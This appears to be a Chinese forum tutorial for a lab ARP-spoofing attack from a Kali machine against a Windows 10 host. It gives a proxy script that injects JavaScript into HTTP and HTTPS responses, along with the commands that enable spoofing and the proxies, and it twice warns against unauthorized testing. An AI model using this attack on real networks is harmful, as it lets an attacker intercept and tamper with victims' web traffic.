0x00 目标
0x01 环境
0x02 测试步骤

遵守网络安全法,请勿未经授权进行测试 !
- 模拟arp欺骗,修改靶机IP的http和https返回包。
0x01 环境
| 名称 | IP | 说明 |
| 攻击 | 192.168.2.x | 虚拟机 kali |
| 靶机 | 192.168.2.x | 客户机 win10 |
0x02 测试步骤
- 在kali /home/test 目录下写一个js脚本
-
JavaScript:
function onResponse(req,res){ if(res.ContentType.indexOf('text/html')==0){ var body=res.ReadBody(); if(body.indexOf('</head>')!=-1){ res.Body=body.replace( '</head>', '<script type="text/javascript">alert("your computer has hacked!")</script></head>' ); } } }
- 攻击目标
- set arp.spoof.targets 192.168.2.1,192.168.2.181 #设置arp欺骗的目标,这里欺骗的是网关和目标机器
set http.proxy.script /home/test/1.js #往http流量中注入脚本
set https.proxy.script /home/test/1.js #往https流量中注入脚本
http.proxy on #开启HTTP代理
https.proxy on #开启HTTPS代理
arp.spoof on #开启ARP欺骗

- 靶机访问http,https网站

遵守网络安全法,请勿未经授权进行测试 !
下载所有附件
-
345.4 KB 查看: 0
-
345.4 KB 查看: 0
-
345.4 KB 查看: 0
由版主最后编辑:
